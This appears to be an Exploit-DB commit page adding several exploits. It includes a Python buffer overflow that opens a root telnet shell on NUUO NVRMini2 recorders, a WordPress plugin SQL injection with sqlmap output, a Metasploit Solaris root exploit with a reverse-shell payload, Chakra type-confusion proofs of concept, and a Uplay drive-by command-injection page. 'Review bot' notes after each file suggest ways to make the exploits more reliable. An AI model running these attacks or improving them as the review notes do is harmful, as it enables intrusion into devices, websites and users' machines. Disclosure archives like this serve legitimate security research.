DB: 2018-09-19

7 changes to exploits/shellcodes

Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)
Microsoft Edge Chakra - 'PathTypeHandlerBase::SetAttributesHelper' Type Confusion
Microsoft Edge Chakra JIT - 'localeCompare' Type Confusion

Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)
NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution

HongCMS 3.0.0 - SQL Injection
HongCMS 3.0.0 - (Authenticated) SQL Injection

Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting

WordPress Plugin Arigato Autoresponder and Newsletter 2.5 - Blind SQL Injection / Reflected Cross-Site Scripting

Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes)
Offensive Security 2018-09-19 05:01:45 +00:00
parent f1d68507cd
commit 29542c36ab
9 changed files with 917 additions and 3 deletions


@ -0,0 +1,98 @@
# Exploit Title: NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
# Date: 2018-09-17
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.nuuo.com/
# Device: NRVMini2
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Versions: 3.8.0 and below
# Tested Against: 03.07.0000.0011 and 03.08.0000.0005
# Tested on: Ubuntu and OSX
# CVE: N/A
# TRA: https://www.tenable.com/security/research/tra-2018-25
# Description:
# A stack buffer overflow exists in the cgi_system binary. The error occurs
# due to lack of bounds checking on the PHPSESSID value before and when
# it is passed to sprintf in order to generate the session id file name.
# As written, this exploit enables Telnet.
# Executes a command via the stack buffer overflow in cookie parsing. The command
# is executed via 'system' as root. The overlow logic is like so:
#
# address 1: 405e2e34 - load system into r3 and address 2 into lr
#
# .text:000D0E34 0F 48 BD E8 LDMFD SP!, {R0-R3,R11,LR}
# .text:000D0E38 1E FF 2F E1 BX LR
#
# address 2: 406037cc - load the system command into r0. Jump to system.
#
# .text:000F17CC 0D 00 A0 E1 MOV R0, SP
# .text:000F17D0 33 FF 2F E1 BLX R3
#
# [ address 1 ][ r0 ][ r1 ][ r2 ][ r3 system ][ r11 ][ LR - addr2 ][ system command ]
# \x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40touch /tmp/lolwat
# PoC
import requests
import socket
import sys
def stack_buffer_overflow(command, ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print '[+] Executing %s on %s:%s...' % (command, ip, port)
sock.connect((ip, int(port)))
exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' +
'Host: ' + ip + ':' + port + '\r\n' +
'Accept: */*\r\n' +
'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' +
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' +
'\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' + command +
'\r\n\r\n')
sock.sendall(exec_request)
data = sock.recv(1024)
sock.close()
# We should get a 500 Internal error in response
return data.find('500') != -1
# Quickly tries to grab the version of the target. If the target is
# using anything other than 3.7 or 3.8 then we'll bail out since
# haven't tested on any other targets
def check_target(ip, port):
index = requests.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo")
return (index.text.find('<Titan>03.08') != -1 or index.text.find('<Titan>03.07') != -1)
if __name__ == "__main__":
if (len(sys.argv) != 3):
print "Usage: python nvrmini2_enable_telnet.py <ipv4 address> <port>"
sys.exit(1)
ip = sys.argv[1]
port = sys.argv[2]
if int(port) > 65535:
print('[-] Invalid port parameter')
sys.exit(0)
if len(ip.split('.')) != 4:
print('[-] Invalid IP address parameter')
sys.exit(0)
print '[+] Checking for a valid target...'
if (check_target(ip, port) == False):
print('[-] The target is not a NVRMini2 or its using an untested version.')
sys.exit(0)
print '[+] Valid target!'
if (stack_buffer_overflow('mount -t devpts devpts /dev/pts', ip, port) == False):
print('[-] Mount failed')
sys.exit(0)
if (stack_buffer_overflow('/bin/sh -c "/usr/sbin/telnetd -l /bin/bash -b 0.0.0.0"&', ip, port) == False):
print('[-] telnetd bind failed')
sys.exit(0)
print('[+] Success!')
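Review bot: `stack_buffer_overflow` reports success on any response containing the substring `500` (`data.find('500') != -1`), and neither that socket nor the `requests.get` in `check_target` sets a timeout, so a device that hangs after the overflow stalls the script and any unrelated 5xx reads as a successful command execution; set `sock.settimeout(...)` and `timeout=` on the GET, and since the second stage binds `telnetd` on the default telnet port, confirm success by connecting to it rather than by the HTTP status. The gadget and `system` addresses (`0x405e2e34`, `0x406037cc`, `0x4054bffc`) are hard-coded library addresses, so the 03.07/03.08 gate in `check_target` is load-bearing and should stay in front of every send. Smaller points: the script is Python 2 only (`print` statements, `str` passed to `sendall`), which belongs next to `Tested on`; the failure paths `sys.exit(0)` with a success status; and two header typos, `# Device: NRVMini2` (NVRMini2) and `overlow` (overflow).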


@ -0,0 +1,116 @@
Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2018-08-22
CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009]
Download Site: https://wordpress.org/plugins/bft-autoresponder/
Vendor: Kiboko Labs https://calendarscripts.info/
Vendor Notified: 2018-08-22, Fixed v2.5.1.5
Vendor Contact: @prasunsen wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=203
Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date.
Vulnerability:
These vulnerabilities require administrative priveledges to exploit.
CVE-2018-1002000
There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request.
In line 69 of file controllers/list.php:
65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")");
del_ids is not sanitized properly.
Nine Reflected XSS.
CVE-2018-1002001
In line 22-23 of controllers/list.php:
22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob'];
23 echo "<meta http-equiv='refresh' content='0;url=$url' />";
CVE-2018-1002002
bft_list.html.php:28:
<div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div>
CVE-2018-1002003
bft_list.html.php:29:
<div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div>
CVE-2018-1002004
bft_list.html.php:42:
<input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>">
CVE-2018-1002005
bft_list.html.php:43:
<input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div>
CVE-2018-1002006
integration-contact-form.html.php:14:
<p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p>
CVE-2018-1002007
integration-contact-form.html.php:15:
<p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p>
CVE-2018-1002008
list-user.html.php:4:
<p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p>
CVE-2018-1002009
unsubscribe.html.php:3:
<p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p>
Exploit Code:
SQL Injection CVE-2018-1002000
$ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql
Where post_data is:
POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 150
Cache-Control: max-age=0
Origin: http://example.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http]
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http]
---
[11:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47'
[*] shutting down at 11:50:08
CVE-2018-1002001
http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
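Review bot: the CVE-2018-1002000 entry says the injection is at line 69 of controllers/list.php while the quoted source line is numbered 65; pick one. The sqlmap request embeds a `_wpnonce=aa7aa407db` captured from the author's session; WordPress nonces are bound to the user session and expire, so a reader has to recapture `post_data` (cookie and nonce) from their own admin session or sqlmap's 300 requests all fail the nonce check before ever reaching the `del_ids` query, and that should be stated above `--load-cookies`. Only CVE-2018-1002001 gets a reproduction URL under 'Exploit Code'; one GET per reflected parameter named in the source lines (`filter_email`, `filter_name`, `sdate`, `filter_signup_date`, `email`, and the POST fields `classes`, `html_id`) would make the other eight checkable. Typo in the Vulnerability section: 'priveledges'.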

exploits/solaris/local/45433.rb Executable file

@ -0,0 +1,250 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Solaris::Priv
include Msf::Post::Solaris::System
include Msf::Post::Solaris::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',
'Description' => %q{
This module exploits an arbitrary file write vulnerability in the
Netscape Portable Runtime library (libnspr) on unpatched Solaris systems
prior to Solaris 10u3 which allows users to gain root privileges.
libnspr versions prior to 4.6.3 allow users to specify a log file with
the `NSPR_LOG_FILE` environment variable. The log file is created with
the privileges of the running process, resulting in privilege escalation
when used in combination with a SUID executable.
This module writes a shared object to the trusted library directory
`/usr/lib/secure` and runs the specified SUID binary with the shared
object loaded using the `LD_LIBRARY_PATH` environment variable.
This module has been tested successfully with libnspr version 4.5.1
on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).
},
'References' =>
[
['BID', '20471'],
['CVE', '2006-4842'],
['EDB', '2543'],
['EDB', '2569'],
['EDB', '2641'],
['URL', 'https://securitytracker.com/id/1017050'],
['URL', 'https://securitytracker.com/id/1017051'],
['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],
['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],
['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']
],
'License' => MSF_LICENSE,
'Author' =>
[
'iDefense', # Discovery
'Marco Ivaldi', # Exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Oct 11 2006',
'Privileged' => true,
'Platform' => ['solaris'],
'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],
'Targets' => [['Auto', {}]],
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultOptions' =>
{
'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
# Some useful example SUID executables:
# * /usr/bin/cancel
# * /usr/bin/chkey
# * /usr/bin/lp
# * /usr/bin/lpset
# * /usr/bin/lpstat
# * /usr/lib/lp/bin/netpr
# * /usr/sbin/lpmove
OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def suid_bin_path
datastore['SUID_PATH']
end
def is_writable?(path)
cmd_exec("[ -w #{path} ] && echo true").include? 'true'
end
def mkdir(path)
vprint_status "Creating directory '#{path}'"
cmd_exec "mkdir -p '#{path}'"
register_dir_for_cleanup path
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_compile(path, data)
upload "#{path}.c", data
output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
register_file_for_cleanup path
end
def check
unless setuid? suid_bin_path
vprint_error "#{suid_bin_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{suid_bin_path} is setuid"
unless has_gcc?
vprint_error 'gcc is not installed'
return CheckCode::Safe
end
vprint_good 'gcc is installed'
# libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable
# Earlier versions may also be vulnerable
libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'
libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\s+([\d\.]+),/).flatten.first
if libnspr_pkg_version.to_s.eql? ''
vprint_error 'Could not determine libnspr version'
return CheckCode::Unknown
end
if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')
vprint_error "libnspr version #{libnspr_pkg_version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "libnspr version #{libnspr_pkg_version} appears to be vulnerable"
# Solaris 10 versions prior to the 2006 patches are known to be vulnerable.
# Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,
# however third-party software may also introduce a vulnerable version of the library.
version = kernel_release
if version.to_s.eql? ''
vprint_error 'Could not determine Solaris version'
return CheckCode::Detected
end
unless Gem::Version.new(version) <= Gem::Version.new('5.10')
vprint_error "Solaris version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Solaris version #{version} appears to be vulnerable"
# The vulnerability was patched in various Solaris patches for different platforms.
# For more information, see:
# - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1
installed_patches = cmd_exec 'showrev -p'
[
119214, # Solaris 10 (x86) patch 119214-10
119213, # Solaris 10 (SPARC) patch 119213-10
119212, # Solaris 9 (x86) patch 119212-10
119211, # Solaris 9 (SPARC) patch 119211-10
119209 # Solaris 8 (SPARC) patch 119209-10
].each do |patch|
if installed_patches =~ / #{patch}-(\d+)/
revision = $1.to_i
if revision >= 10
vprint_error "Solaris patch #{patch}-#{revision} has been applied"
return CheckCode::Safe
end
end
end
vprint_good 'Solaris patches are not installed'
CheckCode::Appears
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
unless is_writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
# Create writable file in /usr/lib/secure
lib_path = '/usr/lib/secure'
lib_name = 'libldap.so.5'
vprint_status "Creating file #{lib_path}/#{lib_name}"
cmd_exec 'umask 0'
cmd_exec "NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\"#{lib_path}/#{lib_name}\" #{suid_bin_path}"
cmd_exec "NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}"
cmd_exec 'umask 022'
unless is_writable? "#{lib_path}/#{lib_name}"
fail_with Failure::Unknown, "Could not create file '#{lib_path}/#{lib_name}'"
end
print_good "Created file #{lib_path}/#{lib_name}"
register_file_for_cleanup "#{lib_path}/#{lib_name}"
# Upload and compile shared object
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
mkdir base_path
payload_name = ".#{rand_text_alphanumeric 5..10}"
payload_path = "#{base_path}/#{payload_name}"
so = <<-EOF
void __attribute__((constructor)) cons() {
setuid(0);
setgid(0);
execle("#{payload_path}", "", 0, 0);
_exit(0);
}
EOF
so_name = ".#{rand_text_alphanumeric 5..10}"
so_path = "#{base_path}/#{so_name}"
upload_and_compile so_path, so
vprint_status "Writing shared object #{lib_path}/#{lib_name}"
cmd_exec "cp '#{so_path}' '#{lib_path}/#{lib_name}'"
register_file_for_cleanup "#{lib_path}/#{lib_name}"
# Upload and execute payload
upload payload_path, generate_payload_exe
cmd_exec "chmod +x #{payload_path}"
print_status 'Executing payload...'
cmd_exec "LD_LIBRARY_PATH=\"#{lib_path}\" #{suid_bin_path} & echo "
end
end
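Review bot: the constructor source in `so` calls `setuid`, `setgid`, `execle` and `_exit` with no `#include <unistd.h>`/`<stdlib.h>`, and `upload_and_compile` fails on any non-empty gcc output instead of on the exit status; a compiler that warns on implicit declarations (gcc 5 and later default to gnu11, which does) will therefore abort with "failed to compile" on a warning rather than an error. Add the includes, or test the command's exit code and print the output only as diagnostics. Two smaller points: `#{lib_path}/#{lib_name}` is registered for cleanup twice (after the NSPR_LOG_FILE creation and again after the `cp`), and the two back-to-back `NSPR_LOG_FILE` invocations differ only in `NSPR_LOG_MODULES=all:5`, so a one-line comment on why the bare second run is needed would save the next maintainer from deleting it.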


@ -0,0 +1,51 @@
/*
Here's a snippet of PathTypeHandlerBase::SetAttributesHelper.
PathTypeHandlerBase *predTypeHandler = this;
DynamicType *currentType = instance->GetDynamicType();
while (predTypeHandler->GetPathLength() > propertyIndex)
{
currentType = predTypeHandler->GetPredecessorType();
if (currentType == nullptr)
{
#ifdef PROFILE_TYPES
instance->GetScriptContext()->convertPathToDictionaryNoRootCount++;
#endif
// This can happen if object header inlining is deoptimized, and we haven't built a full path from the root.
// For now, just punt this case.
return TryConvertToSimpleDictionaryType(instance, GetPathLength())->SetAttributes(instance, propertyId, ObjectSlotAttributesToPropertyAttributes(propertyAttributes));
}
predTypeHandler = PathTypeHandlerBase::FromTypeHandler(currentType->GetTypeHandler());
}
When object header inlining is deoptimized, the type handler of the object is converted to a dictionary type handler. The problem is that it doesn't consider some attributes that dictionary type handlers don't have, so adding or removing those attributes can fail. ObjectSlotAttr_Accessor which indicates that the property is an accessor is one of them.
Here's a snippet of PathTypeHandlerBase::SetPropertyInternal.
else if (isInit)
{
ObjectSlotAttributes * attributes = this->GetAttributeArray();
if (attributes && (attributes[index] & ObjectSlotAttr_Accessor))
{
this->SetAttributesHelper(instance, propertyId, index, attributes, (ObjectSlotAttributes)(attributes[index] & ~ObjectSlotAttr_Accessor), true);
// We're changing an accessor into a data property at object init time. Don't cache this transition from setter to non-setter,
// as it behaves differently from a normal set property.
PropertyValueInfo::SetNoCache(info, instance);
newTypeHandler = PathTypeHandlerBase::FromTypeHandler(instance->GetDynamicType()->GetTypeHandler());
newTypeHandler->SetSlotUnchecked(instance, index, value);
return true;
}
}
We can use the bug to make removing ObjectSlotAttr_Accessor fail. As a result, a data value can be used as an accessor.
PoC:
*/
let o = {
get a() {},
0: 0, // Deoptimizing object header inlining
a: 0x1234
};
o.a; // Type confusion
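Review bot: the PoC has no observable success condition: `o.a` either crashes (the data value 0x1234 being invoked as the getter) or returns silently, so a comment should state the expected outcome under `ch` and spell out that the numeric key `0: 0` is what deoptimizes object header inlining before `a: 0x1234` tries to clear `ObjectSlotAttr_Accessor` through the dictionary conversion path quoted above. Without that, a reader who sees no crash cannot tell a fixed build from a mis-ordered literal.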


@ -0,0 +1,84 @@
/*
A call to the String.prototype.localeCompare method can be inlineed when it only takes one argument. There are two versions of String.prototype.localeCompare, one [1] is written in JavaScript and the other [2] is written in C++ which just calls the JavaScript version when Intl enabled without updating ImplicitCallFlags. Since JavaScript code could be executed without touching ImplicitCallFlags, this could be exploited in a similar way to that I used for issue 1565 .
The only usable code I could find in the JavaScript localeCompare was:
const thatStr = String(that);
I could override the toString method of "that" which is the first parameter to execute arbitrary JavaScript code. But there was a problem that the toString method was also called in the C++ localeCompare prior to executing the JavaScript localeCompare which updated ImplicitCallFlags. Actually calling a JavaScript function can clear the flag during the initialization process [3] if profiling is enabled, but it was not for Intl.js. So I needed to find another way to exploit this.
Here's the JavaScript localeCompare.
let localeCompareStateCache;
platform.registerBuiltInFunction(tagPublicFunction("String.prototype.localeCompare", function (that, locales = undefined, options = undefined) {
if (this === undefined || this === null) {
platform.raiseThis_NullOrUndefined("String.prototype.localeCompare");
}
const thisStr = String(this);
const thatStr = String(that);
// Performance optimization to cache the state object and UCollator when the default arguments are provided
// TODO(jahorto): investigate caching when locales and/or options are provided
let stateObject;
if (locales === undefined && options === undefined) {
if (localeCompareStateCache === undefined) {
localeCompareStateCache = _.create();
InitializeCollator(localeCompareStateCache, undefined, undefined);
}
stateObject = localeCompareStateCache;
} else {
stateObject = _.create();
InitializeCollator(stateObject, locales, options);
}
return platform.localeCompare(thisStr, thatStr, stateObject, /* forStringPrototypeLocaleCompare true);
}), IntlBuiltInFunctionID.StringLocaleCompare);
My idea was to optimize the method partially, so that when it hits an unprofiled instruction, the flag gets cleared during the bailout process [4].
[1] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/InJavascript/Intl.js#L984
[2] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/JavascriptString.cpp#L1297
[3] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Language/InterpreterStackFrame.cpp#L1831
[4] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Backend/BailOut.cpp#L1492
PoC:
*/
function opt(arr, s) {
arr[0] = 1.1;
if (s !== null) {
let tmp = 'a'.localeCompare(s);
}
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 100; i++) {
'a'.localeCompare('x', []); // Optimize the JavaScript localeCompare
opt(arr, null); // for profiling all instructions in opt.
try {
opt(arr, {toString: () => {
throw 1; // Don't profile "if (locales === undefined && options === undefined) {"
}});
} catch (e) {
}
}
opt(arr, {toString: () => {
// Called twice
arr[0] = {};
}});
print(arr);
}
main();
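Review bot: the PoC reproduces only on a ChakraCore build with Intl enabled, because, per the write-up, the C++ `localeCompare` forwards to the Intl.js version only in that configuration, and it relies on the `ch` shell's `print`; both belong in the header. The store `arr[0] = 2.3023e-320` deserves a comment: that denormal's bit pattern is 0x1234, so once the second `toString` call has turned `arr` into a Var array with `arr[0] = {}`, the still-optimized store writes the raw value 0x1234 into the slot and `print(arr)` dereferences it, which is how the confusion in the title manifests. In the quoted Intl.js excerpt the `/* forStringPrototypeLocaleCompare` comment has lost its `*/`, presumably because a closer there would terminate the file's enclosing block comment early; say so rather than leave it looking like a transcription error. Typo: 'inlineed'.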


@ -0,0 +1,82 @@
# Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A
# Vulnerability
# The Uplay desktop client does not properly validate user-controlled data passed to its custom
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF)
# integrated within the Uplay client, allowing for arbitrary code execution.
# Installing Uplay registers the following custom uplay protocol handler:
# HKEY_CLASSES_ROOT
# uplay
# (Default) = "URL:uplay Protocol"
# URL Protocol = ""
# DefaultIcon
# (Default) = "upc.exe"
# Shell
# Open
# Command
# (Default) = "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "%1"
# The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution:
'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
# When a victim opens this URI, the string is passed to the Windows ShellExecute function.
# Microsoft states the following: "When ShellExecute executes the pluggable protocol handler with a
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will
# be interpreted as part of the command line. This means that if you use C/C++s argc and
# argv to determine the arguments passed to your application, the string may be broken
# across multiple parameters."
# "Malicious parties could use additional quote or backslash characters to pass additional command
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on
# the command line could come from malicious parties, and carefully validate them."
# The Uplay desktop client does not properly validate user-controlled data. An attacker can inject
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the
# command line with a quote character and inserts a new switch called --GPU-launcher. Since the
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported.
# The --GPU-launcher switch provides a method to execute arbitrary commands. The following string shows
# the final command, which opens the Windows command prompt and executes the whoami program.
"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "foobar" --GPU-launcher="cmd /K whoami &" --"
# Attack Scenario
# The following attack scenario would result in the compromise of a victim's machine with the vulnerable
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge
# is trying to open "UPlay launcher". After the user gives consent, the vulnerable application runs,
# resulting in arbitrary code execution in the context of the current process.
# This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape
# illegal characters before passing the URI to the protocol handler.
# After Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables
# before the --GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService
# requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear.
# It should be noted, this UAC prompt doesn't prevent command execution from occurring.
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No),
# command execution will still occur once the code that passes the --GPU-launcher switch
# to the CEF is triggered within upc.exe.
# Proof of Concept
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge.
# The first method triggers when the webpage is opened. The second method triggers when the
# hyperlink is clicked by a user.
<!doctype html>
<a href='uplay://foobar" --GPU-launcher="cmd /K whoami &" --'>ubisoft uplay desktop client rce poc</a>
<script>
window.location = 'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
</script>
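Review bot: the final command line shown (`"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "foobar" --GPU-launcher="cmd /K whoami &" --"`) ends in `--"` and the text should say why: the registered handler is `upc.exe "%1"`, so the closing quote is appended by the registry template and the injected trailing `--` is there so that quote attaches to a harmless end-of-switches token instead of breaking the `--GPU-launcher` value; as written it looks like a typo. The PoC's `window.location` assignment fires on page load, so the `<a>` element is never reached in a normal visit; a comment saying the page deliberately carries both triggers (as the prose above it does) would prevent readers from trimming one. The header's `# Tested on: Windows, Microsoft Edge` omits IE, which the Attack Scenario section says also works (with a warning); listing it keeps the metadata and the body consistent.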


@ -6115,7 +6115,9 @@ id,file,description,date,author,type,platform,port
45419,exploits/windows_x86/dos/45419.py,"XAMPP Control Panel 3.2.2 - Denial of Service (PoC)",2018-09-17,"Gionathan Reale",dos,windows_x86,
45420,exploits/windows_x86-64/dos/45420.py,"Notebook Pro 2.0 - Denial Of Service (PoC)",2018-09-17,"Ali Alipour",dos,windows_x86-64,
45421,exploits/windows_x86-64/dos/45421.py,"Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)",2018-09-17,"Jose Eduardo Castro",dos,windows_x86-64,
45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware,
45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware,21
45431,exploits/windows/dos/45431.js,"Microsoft Edge Chakra - 'PathTypeHandlerBase::SetAttributesHelper' Type Confusion",2018-09-18,"Google Security Research",dos,windows,
